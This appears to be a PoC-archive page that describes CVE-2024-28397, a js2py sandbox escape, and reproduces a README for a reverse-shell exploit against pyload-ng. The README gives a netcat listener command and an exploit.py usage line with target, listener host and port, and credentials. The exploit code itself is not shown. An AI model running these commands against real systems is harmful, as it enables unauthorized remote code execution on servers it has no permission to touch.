关联漏洞
标题:
Js2Py 安全漏洞
(CVE-2024-28397)
描述:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞,该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题,攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。
描述
PoC exploit for CVE-2024-28397 – Remote Code Execution in pyload-ng via js2py sandbox escape
介绍
# 🚨 Remote Code Execution – CVE-2024-28397 (pyload-ng / js2py)
This repository contains a **Proof-of-Concept (PoC)** exploit for **CVE-2024-28397**, a Remote Code Execution vulnerability affecting **pyload-ng** due to insecure usage of **js2py**.
> ⚠️ **Disclaimer:**
> This PoC is for **educational and research purposes only**.
> Do not use it on systems you do not own or have explicit permission to test.
> The author is **not responsible** for any misuse of this code.
---
## 🐛 Vulnerability Details
- **CVE ID:** [CVE-2024-28397](https://nvd.nist.gov/vuln/detail/CVE-2024-28397)
- **Component:** `js2py` in `pyload-ng`
- **Impact:** Remote Code Execution (RCE)
- **Attack Vector:** Malicious JS payload escapes the js2py sandbox and executes arbitrary system commands.
---
## 📦 Requirements & Setup
You will need **Python 3.x**, the `requests` library, and `netcat` for catching the reverse shell.
- 🖥️ Target → Vulnerable pyload-ng instance with /run_code endpoint accessible
## 🎧 Listener → Start before running exploit:
**nc -lvnp 4444**
## 🖥️ Usage:
**python3 exploit.py -url http://target.com -lhost YOUR_IP -lport 4444 -user attacker -passwd attacker123**
## 📌 Example Output:
- [+] Register successful!
- [+] Login successful
- [+] exploit worked
文件快照
[4.0K] /data/pocs/afa1980625fbc99231264ceec074b788e48467c9
├── [2.5K] poc.py
└── [1.3K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。